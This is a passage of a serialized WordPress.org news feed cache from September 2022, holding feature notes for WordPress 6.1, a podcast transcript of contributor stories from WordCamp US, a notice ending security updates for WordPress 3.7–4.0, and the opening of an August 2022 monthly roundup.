blocks</li>\n\n\n\n<li>New modal interfaces and preferences improvements</li>\n\n\n\n<li>Automatic navigation block selection with fallbacks and easier menu management</li>\n\n\n\n<li>Apply locking settings to all inner blocks in one click</li>\n\n\n\n<li>Improvements to the block theme discovery experience</li>\n\n\n\n<li>Accessibility updates, with more than 60 resolved tickets</li>\n\n\n\n<li>Performance updates, with more than 25 resolved tickets</li>\n</ul>\n\n\n\n<h3>For developers</h3>\n\n\n\n<ul>\n<li>Opt into appearance tools to make any theme more powerful</li>\n\n\n\n<li>New iteration on the style system</li>\n\n\n\n<li>Add starter patterns to any post type (<a rel=\"noreferrer noopener\" href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/#post-type-patterns\" target=\"_blank\">learn more</a>)</li>\n\n\n\n<li>Evolution of layout options including a new&nbsp;<code>constrained</code>&nbsp;option and the ability to disable layout options</li>\n\n\n\n<li>Content lock patterns for more curation options</li>\n\n\n\n<li>Expanded support for query loop blocks</li>\n\n\n\n<li>Allow the use of block-based template parts in classic themes (<a rel=\"noreferrer noopener\" href=\"https://make.wordpress.org/themes/2022/09/12/testing-and-feedback-for-using-block-based-template-parts-in-classic-themes/\" target=\"_blank\">give feedback</a>)</li>\n\n\n\n<li>Filter <code>theme.json</code> data (<a rel=\"noreferrer noopener\" href=\"https://developer.wordpress.org/block-editor/reference-guides/filters/global-styles-filters/\" target=\"_blank\">learn more</a>)</li>\n\n\n\n<li>Fluid typography allows for more responsiveness (<a rel=\"noreferrer noopener\" href=\"https://make.wordpress.org/themes/2022/08/15/testing-and-feedback-for-the-fluid-typography-feature/\" target=\"_blank\">give feedback</a>)</li>\n\n\n\n<li>Ability to style elements inside blocks like buttons, headings, or captions in <code>theme.json</code></li>\n</ul>\n\n\n\n<p><em>Please note that all features listed in this post are subject to change before the final releas</em>e.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2>A Haiku for you</h2>\n\n\n\n<p>Twenty Twenty-Three<br>10 style variations<br>The new default theme</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>Thank you to the following contributors for collaborating on this post: <a href=\"https://profiles.wordpress.org/dansoschin/\">@dansoschin</a>,  <a href=\"https://profiles.wordpress.org/annezazu/\">@annezazu</a>, <a href=\"https://profiles.wordpress.org/cbringmann/\">@cbringmann</a>, <a href=\"https://profiles.wordpress.org/davidb/\">@davidbaumwald</a>, <a href=\"https://profiles.wordpress.org/priethor/\">@priethor</a>, and <a href=\"https://profiles.wordpress.org/jeffpaul/\">@jeffpaul</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13495\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WP Briefing: Episode 39: Contributor Stories Live from WordCamp US!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://wordpress.org/news/2022/09/episode-39-contributor-stories-live-from-wordcamp-us/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Sep 2022 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13481\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"Live from WordCamp US 2022, listen to contributor stories about why they WordPress. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/09/WP-Briefing-039.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:13436:\"\n<p>In the thirty-ninth episode of the WordPress Briefing, hear contributors at WordCamp US share stories about their why for using WordPress and attending WordCamps. </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a> and <a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a><br>Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<h2>Guests</h2>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/topher1kenobe/\">Topher DeRosia</a><br><a href=\"https://profiles.wordpress.org/jenblogs4u/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/jenblogs4u/\">Jen Miller</a><br><a href=\"https://wordpress.org/support/users/courane01/\" data-type=\"URL\" data-id=\"https://wordpress.org/support/users/courane01/\">Courtney Robertson</a><br><a href=\"https://profiles.wordpress.org/kdrewien/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/kdrewien/\">Kathy Drewien</a><br><a href=\"https://profiles.wordpress.org/alexstine/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/alexstine/\">Alex Stine</a><br><a href=\"https://profiles.wordpress.org/courtneypk/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/courtneypk/\">Courtney&nbsp;Patubo&nbsp;Kranzke</a><br><a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br><a href=\"https://www.linkedin.com/in/ri%C4%8Dardas-kudirka-3815a976/?originalSubdomain=lt\">Ricardas Kudirka</a></p>\n\n\n\n<h2>References</h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/polyglots/2022/09/06/announcement-wordpress-translation-day-2022/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/polyglots/2022/09/06/announcement-wordpress-translation-day-2022/\">WordPress Translation Day September 28, 2022</a><br><a href=\"https://woosesh.com/\" data-type=\"URL\" data-id=\"https://woosesh.com/\">WooSesh October 11-13, 2022</a><br><a href=\"https://2022.allthingsopen.org/\" data-type=\"URL\" data-id=\"https://2022.allthingsopen.org/\">All Things Open October 30-November 2, 2022</a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13481\"></span>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:00]&nbsp;</strong></p>\n\n\n\n<p>Hello, everyone! And welcome to the WordPress Briefing, the podcast where you can catch quick explanations of some of the ideas behind the WordPress open source project and the community around it, as well as get a small list of big things coming up in the next two weeks. I’m your host, Josepha Haden Chomphosy.&nbsp;</p>\n\n\n\n<p>Here we go!</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:41]&nbsp;</strong></p>\n\n\n\n<p>For folks who are new to WordPress in the past couple of years, you may have heard people talk about WordPress events with a sort of passion that really is hard to describe. For me, I know our events are the dark matter of what makes this global, fully distributed, multifaceted project come together so well in the end.</p>\n\n\n\n<p>But I also know that WordPressers have so many different reasons for coming together. So we took a little wander through WordCamp US to get their take on why they use WordPress and also why they go to WordCamps.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:01:13]&nbsp;</strong></p>\n\n\n\n<p>So WordCamp US is back in person for the first time since 2019. What are you most excited about?</p>\n\n\n\n<p><strong>[Topher 00:01:19]&nbsp;</strong></p>\n\n\n\n<p>I am Topher.</p>\n\n\n\n<p>Seeing everyone, the interpersonal relationships, the communication, the expressions on people&#8217;s faces that you don&#8217;t get via email or Slack or whatever. Just being near people again and enjoying each other&#8217;s company.</p>\n\n\n\n<p><strong>[Jen Miller 00:01:35]&nbsp;</strong></p>\n\n\n\n<p>My name is Jen Miller.</p>\n\n\n\n<p>I was most excited to see my friends. It&#8217;s been a long time to try to maintain connections via social media and, you know, texting and phone calls. But being here and being a part of the WordPress community has made everything great.</p>\n\n\n\n<p><strong>[Courtney Robertson 00:01:54]&nbsp;</strong></p>\n\n\n\n<p>Courtney Robertson.</p>\n\n\n\n<p>Contributor day, of course, that&#8217;s how I got really connected to the WordPress community. And I am hoping we have a great turnout.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:02:02]&nbsp;</strong></p>\n\n\n\n<p>How long have you been a contributor to WordPress?</p>\n\n\n\n<p><strong>[Kathy Drewien 00:02:05]&nbsp;</strong></p>\n\n\n\n<p>Hi, I&#8217;m Kathy Drewien.</p>\n\n\n\n<p>I started in 2008 by attending my first WordCamp. Two years later, I was part of the organizing team for WordCamp Atlanta. I have been on that team for one role or another. Well, I can&#8217;t tell you how many years now. From then, until now.</p>\n\n\n\n<p><strong>[Alex Stine 00:02:24]&nbsp;</strong></p>\n\n\n\n<p>My name is Alex Stine. About six years now.</p>\n\n\n\n<p><strong>[Topher 00:02:28]&nbsp;</strong></p>\n\n\n\n<p>About 12 years.</p>\n\n\n\n<p>I started going to WordCamp, then working in the support forums, and just grew from there.</p>\n\n\n\n<p><strong>[Courtney Robertson 00:02:24]&nbsp;</strong></p>\n\n\n\n<p>I started checking guests in, at my first WordCamp in 2009, which I see as one avenue of contributing. I joined a team officially in 2014.&nbsp;</p>\n\n\n\n<p><strong>[</strong><strong>Courtney Patubo Kranzke </strong><strong>00:02:47]&nbsp;</strong></p>\n\n\n\n<p>My name is Courtney Patubo Kranzke.</p>\n\n\n\n<p>I have been an on-and-off contributor to WordPress since like the mid-2000s, but I&#8217;ve been a sponsored contributor since 2016.</p>\n\n\n\n<p><strong>[</strong><strong>Dustin Hartzler </strong><strong>00:03:02]&nbsp;</strong></p>\n\n\n\n<p>My name is Dustin Hartzler.</p>\n\n\n\n<p>I started a WordPress podcast in 2010. And I did like 500 episodes in a row without a break and without a week worth of rest. So I consider that my contribution to WordPress. I have a couple of core contributions, like I, I fixed a little bug here, a little bug there in a couple of releases, I think back in the four eras, 4.1 or 4.2 or something.</p>\n\n\n\n<p>2010 is when I really got started in giving back, and, like, sharing my knowledge with the WordPress community.</p>\n\n\n\n<p><strong>[</strong><strong>Josepha Haden Chomphosy </strong><strong>00:03:28]&nbsp;</strong></p>\n\n\n\n<p>Why is it important for you to attend WordCamps or contribute to the WordPress project?</p>\n\n\n\n<p><strong>[</strong><strong>Ricardas Kudirka </strong><strong>00:03:33]&nbsp;</strong></p>\n\n\n\n<p>My name is Ricardas Kudirka.</p>\n\n\n\n<p>Basically, for everyone who&#8217;s using WordPress, it&#8217;s really important to understand how big the community is that we have here. So the community is an important and crucial part of WordPress.</p>\n\n\n\n<p>And for it to grow, you need to attend the WordCamps, you need to share knowledge, and you need to meet people. So networking here and while meeting the exciting people who are developing WordPress or who are contributing to it, who are providing the services, who enable people to use WordPress.</p>\n\n\n\n<p>That&#8217;s a crucial point for everyone to attend.</p>\n\n\n\n<p><strong>[</strong><strong>Kathy Drewien </strong><strong>00:04:05]&nbsp;</strong></p>\n\n\n\n<p>It&#8217;s important to attend them because it&#8217;s very hard to describe them. We are not like any other thing you have ever done in your life. You have to be here to get it. And then once you get it, you wanna do more of it. It&#8217;s magical. It&#8217;s magical. There&#8217;s no way to get that experience without being here.</p>\n\n\n\n<p>In terms of contributing, it&#8217;s a responsible thing to do. You want to give back instead of get, get, get. In the beginning, we&#8217;re all about the get, get, get. And then you go, oh my gosh. I didn&#8217;t know. I didn&#8217;t know I could do this. I didn&#8217;t know I had to write code. I can actually just stand around and talk to people and contribute to the project.</p>\n\n\n\n<p><strong>[</strong><strong>Jen Miller </strong><strong>00:04:50]&nbsp;</strong></p>\n\n\n\n<p>Well, it&#8217;s a community effort, and so if we want it to progress and grow, we need to put our own individual effort into the community.</p>\n\n\n\n<p>Plus, we make friends, we make connections, and we find people who we can help and who can help us.</p>\n\n\n\n<p><strong>[</strong><strong>Alex Stine </strong><strong>00:05:07]</strong></p>\n\n\n\n<p>I feel it is important to support the community that got me my start in technology and make sure that people understand that accessibility is very much a requirement.</p>\n\n\n\n<p>You know, we need to make sure we keep the community inclusive for all.</p>\n\n\n\n<p><strong>[</strong><strong>Josepha Haden Chomphosy </strong><strong>00:05:21]</strong></p>\n\n\n\n<p>What is your favorite way to WordPress?</p>\n\n\n\n<p><strong>[</strong><strong>Courtney Patubo Kranzke </strong><strong>00:05:24]&nbsp;</strong></p>\n\n\n\n<p>I started with WordPress as a personal blogger. So it continues to be my favorite way to use WordPress. But, my use has evolved to using it for work as well as a place to share my photography and food blogging.</p>\n\n\n\n<p><strong>[</strong><strong>Courtney Robertson </strong><strong>00:05:42]&nbsp;</strong></p>\n\n\n\n<p>My favorite way to WordPress is through the Training team. Most of the things that I write these days are on make.wordpress.org/training and or learn.wordpress.org.</p>\n\n\n\n<p>I love teaching people about WordPress, helping people at all skill levels advance, and that&#8217;s where you&#8217;ll find me around the WordPress Training team.</p>\n\n\n\n<p><strong>[</strong><strong>Dustin&nbsp; Hartzler </strong><strong>00:05:59]&nbsp;</strong></p>\n\n\n\n<p>My favorite way to WordPress is just building cool things. Like I have a website, my wife has a couple of websites, and me just trying to learn things and trying to do them myself. Yesterday, there was a session, a 15-minute long session, and I learned how to customize the options available for different core WordPress blocks.</p>\n\n\n\n<p>I didn&#8217;t realize that you could just make a button and like make a default like here&#8217;s the style for the default button. So every button&#8217;s exactly the same on the site. Like how cool is that? I like the side of customizing WordPress to make it easier for people who are non-techy like me to use my site, like my wife, and whatnot.</p>\n\n\n\n<p><strong>[</strong><strong>Josepha Haden Chomphosy </strong><strong>00:06:30]&nbsp;</strong></p>\n\n\n\n<p>How do you use WordPress in your day-to-day life?</p>\n\n\n\n<p><strong>[</strong><strong>Topher </strong><strong>00:06:32]&nbsp;</strong></p>\n\n\n\n<p>It&#8217;s sort of a universal tool for me. I blog, and I do podcasts.</p>\n\n\n\n<p>I enjoy drinking whiskey, so I built a rating system for it. And I use it as a notepad, a scratch pad. I use it as my photography backup system. Just kind of as a universal tool for everything</p>\n\n\n\n<p><strong>[</strong><strong>Alex Stine </strong><strong>00:06:53]</strong></p>\n\n\n\n<p>So I currently am one of the Accessibility team reps.</p>\n\n\n\n<p>I&#8217;m a core contributor, Guttenberg contributor, the occasional meta contributor, and the occasional training team contributor.</p>\n\n\n\n<p><strong>[</strong><strong>Josepha Haden Chomphosy </strong><strong>00:07:05]</strong></p>\n\n\n\n<p>Well, if that doesn&#8217;t convince you to go to a WordCamp or start your own meetup group, I just don&#8217;t know what will. Big thanks to everyone who sat down with us there in San Diego.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:07:23]</strong></p>\n\n\n\n<p>And now it&#8217;s time for our small list of big things.</p>\n\n\n\n<p>First thing, WordPress Global Translation Day is coming up next week on September 28th. This is a great opportunity to learn more about the hard work that goes into translating all of this software for folks all around the world. If you want to learn more about how you could contribute to translations, I&#8217;ll have a link in the show notes for you.</p>\n\n\n\n<p>The second thing is that WooSesh is coming up on October 11th through 13th, 2022. This one is not an in-person event. It&#8217;s a WPSessions event, but it specifically talks about how to get some eCommerce going on your WordPress site. So if you&#8217;ve been thinking about how to get a shop on your site, or just making your current shop a bit more complicated, then this is the event for you.</p>\n\n\n\n<p>And the third thing on our list today is All Things Open. They are hosting a hybrid event this year from October 31st through November 2nd. This event isn&#8217;t specific to WordPress, but it is specific to open source and one of the best resources for learning some OSS basics. So if you&#8217;ve been interested in learning more about how this whole open source thing is an idea that will change our generation, then set your sights on that event. I will have a link in the show notes there as well.</p>\n\n\n\n<p>And that, my friends, is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy. And I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13481\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"Dropping security updates for WordPress versions 3.7 through 4.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://wordpress.org/news/2022/09/dropping-security-updates-for-wordpress-versions-3-7-through-4-0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 07 Sep 2022 13:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13466\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:343:\"As of December 1, 2022 the WordPress Security Team will no longer provide security updates for WordPress versions 3.7 through 4.0. These versions of WordPress were first released eight or more years ago so the vast majority of WordPress installations run a more recent version of WordPress. The chances this will affect your site, or [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Peter Wilson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2478:\"\n<p>As of December 1, 2022 the WordPress Security Team will no longer provide security updates for WordPress versions 3.7 through 4.0.</p>\n\n\n\n<p>These versions of WordPress were first released eight or more years ago so the vast majority of WordPress installations run a more recent version of WordPress. The chances this will affect your site, or sites, is very small.</p>\n\n\n\n<p>If you are unsure if you are running an up-to-date version of WordPress, please log in to your site’s dashboard. Out of date versions of WordPress will display a notice that looks like this:</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"698\" height=\"81\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/09/update-notice.png?resize=698%2C81&#038;ssl=1\" alt=\"WordPress update notice: &quot;WordPress 6.0.2 is available! Pleaes update now.&quot;\" class=\"wp-image-13467\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/09/update-notice.png?w=698&amp;ssl=1 698w, https://i0.wp.com/wordpress.org/news/files/2022/09/update-notice.png?resize=300%2C35&amp;ssl=1 300w\" sizes=\"(max-width: 698px) 100vw, 698px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>In WordPress versions 3.8 &#8211; 4.0, the version you are running is displayed in the bottom of the “At a Glance” section of the dashboard. In WordPress 3.7 this section is titled “Right Now”.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"295\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/09/at-a-glance-widget.png?resize=1024%2C295&#038;ssl=1\" alt=\"&quot;At a Glance&quot; section of the WordPress dashboard. The final line includes the exact version of WordPress the site is running.\" class=\"wp-image-13468\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/09/at-a-glance-widget.png?resize=1024%2C295&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2022/09/at-a-glance-widget.png?resize=300%2C86&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2022/09/at-a-glance-widget.png?resize=768%2C221&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2022/09/at-a-glance-widget.png?w=1208&amp;ssl=1 1208w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>The Make WordPress Security blog has further details about <a href=\"https://make.wordpress.org/security/2022/09/07/dropping-security-updates-for-wordpress-versions-3-7-through-4-0/\">the process to end support</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13466\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"The Month in WordPress – August 2022\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://wordpress.org/news/2022/09/the-month-in-wordpress-august-2022/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2022 13:23:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:18:\"month in wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13445\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:361:\"August has been a busy month, with the redesign of WordPress.org, new localized content on Learn WordPress, and the WordPress 6.0.2 security and maintenance release. But that&#8217;s not all! Read on to catch up on the latest WordPress news. WordPress 6.1 walk-through scheduled for September 13, 2022 Save the date! A live interactive walk-through of [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"rmartinezduque\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:15623:\"\n<p>August has been a busy month, with the redesign of WordPress.org, new localized content on Learn WordPress, and the WordPress 6.0.2 security and maintenance release. But that&#8217;s not all! Read on to catch up on the latest WordPress news.</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<h2>WordPress 6.1 walk-through scheduled for September 13, 2022</h2>\n\n\n\n<p>Save the date! A <strong>live interactive walk-through of WordPress 6.1 is coming up on September 13, 2022, at 16:00 UTC</strong>. The event will take place <a href=\"http://dotorgzoom.wordpress.com/\">via Zoom</a> and include a discussion of new major features, resolved tickets, and potential blockers.</p>\n\n\n\n<p>Attendance is open to anyone who wants to know more about what’s coming in the next major release. If you are unable to attend, the event will be recorded for on-demand viewing.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://make.wordpress.org/core/2022/09/05/6-1-product-walk-through/\">Learn more about the WordPress 6.1 product walk-through</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>The WordPress.org Homepage and Download page got a new jazz-inspired look</h2>\n\n\n\n<p>The <a href=\"https://wordpress.org/news/2022/08/a-new-wordpress-org-homepage-and-download-page/\">redesign of the WordPress.org homepage and download page</a> went live on August 15, 2022. The new pages highlight the benefits of using WordPress while making it easy to access resources for getting started. The look and feel build on the jazzy aesthetic that WordPress is known for.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"599\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/08/launch-featured.png?resize=1024%2C599&#038;ssl=1\" alt=\"WordPress.org homepage\" class=\"wp-image-13323\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/08/launch-featured.png?resize=1024%2C599&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2022/08/launch-featured.png?resize=300%2C175&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2022/08/launch-featured.png?resize=768%2C449&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2022/08/launch-featured.png?resize=1536%2C898&amp;ssl=1 1536w, 